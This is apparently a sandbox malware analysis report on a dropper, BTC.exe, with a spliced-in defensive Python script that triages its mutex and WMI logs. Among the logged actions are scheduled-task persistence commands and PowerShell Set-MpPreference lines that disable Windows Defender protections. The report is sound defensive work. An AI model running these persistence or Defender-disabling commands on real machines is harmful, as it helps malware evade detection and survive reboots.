                            Source: Windows Defender Service Host.exe.0.dr, Settings.csBase64 encoded string: '/u4ef6e+nS3A9mY7wLdkKdx/z2PWLlxGPGu8l+4KvRW5CU0SmqA+xeI+TI0PfSJS', '+B1RkBjlG/ongUjWjfeMac6GZMTnlcpzZSkEXBjY9Q05LLqNl8D36JB4MFovFitU', 'MJxqtbdTMHxK1dHuWOFYXzzMQpufnEb5J/P6MBeIFsyMuryzLLG869pCiUQtO+2L', 'rG2Gd+ezCKZI9+LFMrsOdU7/pdqCc6qwQw4ih5AnBkAZAgzjJWh+1iL6AMrluxMB', 'xZGSufyPtUb0tRhWBSvMzlk7HG2FcH+aICaXo02j7JblesXwNxLObDAZU1+xdBu/'
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, Settings.csBase64 encoded string: '/u4ef6e+nS3A9mY7wLdkKdx/z2PWLlxGPGu8l+4KvRW5CU0SmqA+xeI+TI0PfSJS', '+B1RkBjlG/ongUjWjfeMac6GZMTnlcpzZSkEXBjY9Q05LLqNl8D36JB4MFovFitU', 'MJxqtbdTMHxK1dHuWOFYXzzMQpufnEb5J/P6MBeIFsyMuryzLLG869pCiUQtO+2L', 'rG2Gd+ezCKZI9+LFMrsOdU7/pdqCc6qwQw4ih5AnBkAZAgzjJWh+1iL6AMrluxMB', 'xZGSufyPtUb0tRhWBSvMzlk7HG2FcH+aICaXo02j7JblesXwNxLObDAZU1+xdBu/'
                            Source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, Settings.csBase64 encoded string: 'Qn8SqsI3jUQBAUjqjalm3oJMLd/PbscIFd6rNbQ5sRZNn4xQ1j9+smFfWlHEI1gikBTJ0XwXBbd7vrP4j7UNlA==', 'WwGUu43hHVOQw4bhNIONAbpY8cH0OewHJ6IJs1kKJ+cu/7wi9YsKufGrVcAtJreaghEgt3mKwnnP4jUNLVCerlv/S0eftqeHDCa8kAVIzT4=', 'wxTsCpYNu1AiEBtW0/wF2Xsle2ZY6OiGu6IE3jMxekVMgibQsLE47ouxwB/hD5QIHh1HjkaDjgCTz5TgDgJNhfsNtnq3Hb5jHb1NqETf8pbbLS5GP3lA9At6RUJ33ZCh', 'ywn+OxV3qgXWKyUE+iTmL0mFT3aNwmXqH/A241apHqZR5xfPAY4d1oDzbkJMbCrW0mumEKlXNebqerwRdgmFPQ==', 'gqkeIT57xRAiTK0cwZ6vsPBVrF0/NDUstza9ynwGWtvf8Ikec+nCNSi1LMiuTooq/10AN/TPgcmVUIqCUEdSC+N3b3XTX/vyxzaoictl2YTNTKnr2Wd0CTayJNMJJO2HnwzX/IcrtvB2OEom1X7k89XKpqtumdHAbhG5k5Pq+iJJMnEILpumZQPlFyx0gLmYeoB6RStu4pjFHTRwRLjeGFyya8H5z/JC57mRUfBEldhE1ixIz594/p7YKZO7vFAwOcX5DOjdIwfkQgr4Pm0cYGAulm7CltV5JIpNvZFUSdPuSgg4DbHA/9otLbVYpvJVbeQYyKYXPYHDWcZdfOIXeIHD3vHTmyratXNG79vHJKw09fi94gorFFsXvK507/lb9VMt0ZaMOklRzlEANuezAw6dgaAuo70n07xZAm122efC53PMp3JBRwWMdQJYV0lt7wOS6WFsAnTkq5g8w7k9rq9m6IsC+3xK56aCEOg1KAskBhtSRxGesNc2R2caPu2ST8jMaEFbzpm9hkSiE04B5lK2z0aamcTFnVTr3VNjgEYQlYIEH3lA0W0i6h7IXb6egtq6xFXa+LRts6CuatPS/hBpBEZsx6jr9cd5KLbQE7aFo7V+SltqBkxzUDlJty7VFLQyueR9/wMNL8OpmuZB6LEjm5p/dOFq0vXxu2BPfB/rIIeYUO6LYjPOPnRGM5q8AljGk4DuN8EcGDBPyi7MNI7LK6nCKbeHYcWkgJ8bYBWSYY9QQyDfHgEARc0boHkf5Fyt9HqxkoNRqmZtpEFDIkGBNbjFjcFZ7D6kj6zg27/qRT+gAKGPURs4CpYTp6Uds5AnnAYUfb72mlesTlGaLk+nCHKfcclYpFgWL+01zq/jDQyR9nqBQe4F5ik+Hp6B4zLWK+blzxbwYBFyw4VkokxHzk0biXCYez/dQI742PTZZAO/olRR4jnSClF8t3MRRw6AjUTN9wwtDR7+M00ii/bsoBwgu6PCOgeXKM039XR5LJ1R6Au3nwJKEhbc1xfuO37uBzeAa6HCGc2Cx28JTwqHoz3BMBzvBWb59jvsNEUeBB6ON1pakDvMopL1ccCe', 'Q/UCu6O47CHFGS6KCBvM4o1+Usq+s6Ccg2UKnm/GJqCVWrBQ3L9hKjojrlgaefg1NwBAJ8ORnVT5JMNcdmWzFw==', 'j/7gTotOxXp2+vfq93u+6A2lmLCVvVGgv+oHm8X+q2MPS5v1jKAaieoUVjlLC4fPtYq6cVnDufXuNZZwXbzmLg==', '/h1sm9P1a0vsAHGS8FWEGBd85oCTGrU9bR3qkhrL/yHSsHXp+/O5kqUUccsMCZ4KW+AmDJ3iXa56+31XiEJM+Q=='
                            Source: svchost.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: svchost.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: Cracked.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: Cracked.exe.0.dr, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 0.2.BTC.exe.2c8fa48.3.raw.unpack, Methods.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: 0.2.BTC.exe.2c80488.2.raw.unpack, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: Windows Defender Service Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: Windows Defender Service Host.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: update.exe.0.dr, .csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                            Source: update.exe.0.dr, .csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                            Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@160/314@6/12
                            Source: C:\Users\user\AppData\Roaming\Cracked.exeCode function: 3_2_00007FF848F028CD CreateToolhelp32Snapshot,3_2_00007FF848F028CD
                            Source: C:\Users\user\Desktop\BTC.exeFile created: C:\Users\user\AppData\Roaming\crack.exeJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7176:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9000:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7664:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe Mutant created: \Sessions\1\BaseNamedObjects\vsvf
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8196:120:WilError_03
                            Source: C:\Users\user\Desktop\BTC.exe Mutant created: \Sessions\1\BaseNamedObjects\ByAnl9OXWt9lDZxwI
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe Mutant created: NULL
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8972:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:748:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5344:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7880:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe Mutant created: \Sessions\1\BaseNamedObjects\VNM_MUTEX_h1gQxrpyccCFZq7JPS
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8144:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7056:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe Mutant created: \Sessions\1\BaseNamedObjects\4chIqEbR5Rq6U6EI
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7940:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5640:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2284:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7488:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\crack.exe File created: C:\Users\user\AppData\Local\Temp\tmpE49C.tmp
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE306.tmp.bat""
                            Source: BTC.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: BTC.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
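The behaviour entries in this section (the mutant list above and the WMI query list that follows) mix sandbox noise with real indicators: conhost.exe's WilError mutants appear in every console spawn, while the named mutexes come from binaries dropped under the user profile with system-like names, and one of the dropped svchost.exe copies polls the process list through WMI. The Python below is an added triage example written for this page; it is not part of the Joe Sandbox report or of any Joe Sandbox tooling. It parses behaviour entries in the format shown here (including the fused form without a space after ".exe"), discards the known-noise mutants, flags mutants created by binaries in user-writable locations (calling out masquerading names and the VNM_MUTEX_ prefix, which this report ties to its VenomRAT detection), and collapses identical WQL statements per process so that a process-enumeration loop stands out. The path markers, the system-like word list and the repeat threshold are the example author's heuristics, and the sample input is constructed from lines on this page.

```python
import re
from collections import Counter
from typing import NamedTuple, Optional

# Constructed sample: entries copied from the behaviour listing on this page, some in the
# fused "...exeMutant created:" form in which the page renders them.
SAMPLE_REPORT = r"""
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe Mutant created: \Sessions\1\BaseNamedObjects\vsvf
Source: C:\Users\user\Desktop\BTC.exe Mutant created: \Sessions\1\BaseNamedObjects\ByAnl9OXWt9lDZxwI
Source: C:\Users\user\AppData\Roaming\Window Security.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe Mutant created: \Sessions\1\BaseNamedObjects\VNM_MUTEX_h1gQxrpyccCFZq7JPS
Source: C:\Users\user\AppData\Roaming\Cracked.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE306.tmp.bat""
Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\svchost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
"""

# "Source: <process> <event kind>: <detail>". The source path is matched lazily up to its
# first ".exe", so the fused form without a separating space parses as well.
EVENT_RE = re.compile(r"^Source:\s*(?P<source>.+?\.exe)\s*"
                      r"(?P<kind>Mutant created|File created|Process created|WMI Queries):\s*(?P<detail>.*)$")
USER_WRITABLE_MARKERS = ("\\users\\", "\\programdata\\", "\\temp\\")            # heuristic (author's assumption)
SYSTEM_LIKE_WORDS = ("svchost", "windows", "microsoft", "security", "defender")  # heuristic, not exhaustive

class Event(NamedTuple):
    source: str   # process that performed the action
    kind: str     # "Mutant created", "Process created", "WMI Queries", ...
    detail: str   # object name, command line or WQL statement

def parse_line(line: str) -> Optional[Event]:
    m = EVENT_RE.match(line.strip())
    return Event(m["source"], m["kind"], m["detail"].strip()) if m else None

def parse_report(text: str) -> list:
    return [ev for ev in map(parse_line, text.splitlines()) if ev]

def is_user_writable(path: str) -> bool:
    """Binary runs from a location a standard user can write to."""
    return any(marker in path.lower() for marker in USER_WRITABLE_MARKERS)

def is_masquerading(path: str) -> bool:
    """System-sounding file name that does not live under C:\\Windows."""
    p = path.lower()
    name = p.rsplit("\\", 1)[-1]
    return any(w in name for w in SYSTEM_LIKE_WORDS) and not p.startswith("c:\\windows\\")

def is_known_noise(ev: Event) -> bool:
    """conhost.exe's Local\\SM0:<pid>:120:WilError_03 mutant is Windows Implementation Library
    error-reporting housekeeping created on every console spawn; it says nothing about the sample."""
    return (ev.kind == "Mutant created" and ev.source.lower().endswith("\\conhost.exe")
            and "WilError_" in ev.detail)

def triage_mutants(events) -> dict:
    out = {"noise": [], "suspicious": [], "other": []}
    for ev in (e for e in events if e.kind == "Mutant created"):
        if is_known_noise(ev):
            out["noise"].append(ev)
        elif not is_user_writable(ev.source):
            out["other"].append(ev)
        else:
            reasons = ["mutex created by a binary in a user-writable location"]
            if is_masquerading(ev.source):
                reasons.append("system-like file name outside C:\\Windows")
            if ev.detail.rsplit("\\", 1)[-1].startswith("VNM_MUTEX_"):
                reasons.append("VNM_MUTEX_ prefix (string tied to this report's VenomRAT detection)")
            out["suspicious"].append((ev.source, ev.detail, reasons))
    return out

def wmi_findings(events, min_repeats: int = 3) -> list:
    """Collapse identical WQL statements per process: the same Win32_Process SELECT issued again
    and again is a polling loop over the process list (RAT process watcher or analysis-tool
    check); Win32_Processor reads are host fingerprinting of the kind used for VM/sandbox checks."""
    counts = Counter()
    for ev in (e for e in events if e.kind == "WMI Queries"):
        counts[(ev.source, ev.detail.split(" : ", 1)[-1].strip())] += 1
    findings = []
    for (source, wql), n in counts.items():
        if re.search(r"\bwin32_process\b", wql, re.I) and n >= min_repeats:
            findings.append((source, wql, n, "repeated process enumeration"))
        elif re.search(r"\bwin32_processor\b", wql, re.I):
            findings.append((source, wql, n, "CPU fingerprinting"))
    return findings

def triage(report_text: str) -> dict:
    events = parse_report(report_text)
    return {"events": len(events), "mutants": triage_mutants(events), "wmi": wmi_findings(events),
            "child_processes": [(e.source, e.detail) for e in events if e.kind == "Process created"]}

if __name__ == "__main__":
    result = triage(SAMPLE_REPORT)
    for src, name, reasons in result["mutants"]["suspicious"]:
        print(f"[mutex] {src} -> {name}: {'; '.join(reasons)}")
    for src, wql, n, why in result["wmi"]:
        print(f"[wmi]   {src} x{n}: {wql} ({why})")
```

The repeat threshold of three is deliberately low for the embedded sample; against the full listing the svchost.exe copy in the Roaming folder issues the same Win32_Process query well over a hundred times, which is the shape a process watcher leaves in WMI telemetry. Anything landing in the "other" bucket (a named mutex from a binary under C:\Windows that is not the WilError pattern) is worth a manual look rather than an automatic verdict.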
                            Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor (identical entry logged 2 times)
                            Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process (identical entry logged 117 times)
                            Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor (identical entry logged 4 times)
                            Source: C:\Users\user\AppData\Roaming\svchost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                            Source: C:\Users\user\AppData\Roaming\update.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor (identical entry logged 2 times)
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                            Source: C:\Users\user\AppData\Roaming\update.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\AppData\Roaming\update.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_processor
                            Source: C:\Users\user\Desktop\BTC.exe | File read: C:\Users\user\Desktop\desktop.ini
                            Source: C:\Users\user\Desktop\BTC.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: tmpFB68.tmp.dat.5.dr, tmpFB52.tmp.dat.4.dr, tmpFF50.tmp.dat.4.dr, tmpFAF4.tmp.dat.5.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                            Source: BTC.exe | Virustotal: Detection: 63%
                            Source: unknown | Process created: C:\Users\user\Desktop\BTC.exe "C:\Users\user\Desktop\BTC.exe"
                            Source: C:\Users\user\Desktop\BTC.exe | Process created: C:\Users\user\AppData\Roaming\crack.exe "C:\Users\user\AppData\Roaming\crack.exe"
                            Source: C:\Users\user\Desktop\BTC.exe | Process created: C:\Users\user\AppData\Roaming\Cracked.exe "C:\Users\user\AppData\Roaming\Cracked.exe"
                            Source: C:\Users\user\Desktop\BTC.exe | Process created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                            Source: C:\Users\user\Desktop\BTC.exe | Process created: C:\Users\user\AppData\Roaming\update.exe "C:\Users\user\AppData\Roaming\update.exe"
                            Source: C:\Users\user\Desktop\BTC.exe | Process created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
                            Source: C:\Users\user\Desktop\BTC.exe | Process created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"' & exit
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Cracked.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE306.tmp.bat""
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Windows Security Health Service" /tr '"C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"'
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\Window Security.exe" /rl HIGHEST /f
                            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\timeout.exe timeout 3
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe"
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-MpPreference -verbose
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\crack.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpE49C.tmp.cmd""
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe "C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"
                            Source: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windows Defender Service Host" /tr "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                            Source: C:\Windows\System32\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknown | Process created: C:\Users\user\AppData\Roaming\Window Security.exe "C:\Users\user\AppData\Roaming\Window Security.exe"
                            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 4
                            Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\user\AppData\Roaming\Windows Security Health Service.exe "C:\Users\user\AppData\Roaming\Windows Security Health Service.exe"
                            Source: unknown | Process created: C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe "C:\Users\user\AppData\Roaming\Windows Defender Service Host.exe"
                            Source: C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Windows Update" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\SubDir34\Windows Security.exe" /rl HIGHEST /f
                            Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\AppData\Roaming\Window Security.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
